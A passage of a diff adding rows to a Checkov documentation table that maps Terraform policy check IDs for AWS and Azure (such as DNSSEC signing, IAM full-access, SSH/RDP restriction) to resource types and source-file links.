+| 1126 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1127 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1128 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1129 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1130 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1131 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1132 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1133 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1134 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1135 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1136 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1137 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1138 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1139 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1140 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1141 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1142 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1143 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1144 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1145 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1146 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1147 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1148 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1149 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1150 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1151 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1152 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1153 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1154 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1155 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) |
+| 1156 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) |
+| 1157 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1158 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1159 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1160 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1161 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1162 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
+| 1163 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) |
+| 1164 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) |
+| 1165 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) |
+| 1166 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
+| 1167 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) |
+| 1168 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
+| 1169 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) |
+| 1170 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) |
+| 1171 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
+| 1172 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) |
+| 1173 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) |
+| 1174 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) |
+| 1175 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) |
+| 1176 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1177 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1178 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) |
+| 1179 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
+| 1180 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) |
+| 1181 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) |
+| 1182 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) |
+| 1183 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) |
+| 1184 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1185 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1186 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1187 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1188 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1189 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) |
+| 1190 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1191 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | +| 1192 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | +| 1193 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1194 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1195 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | +| 1196 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | +| 1197 | CKV2_AWS_62 | resource | 
aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | +| 1198 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | +| 1199 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | +| 1200 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | +| 1201 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | +| 1202 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1203 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | 
[SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1204 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1205 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1206 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | +| 1207 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1208 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | +| 1209 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | +| 1210 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP 
Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | +| 1211 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | +| 1212 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | +| 1213 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1214 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1215 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1216 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1217 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 
0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1218 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1219 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1220 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1221 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1222 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1223 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1224 | CKV_AZURE_13 | resource | 
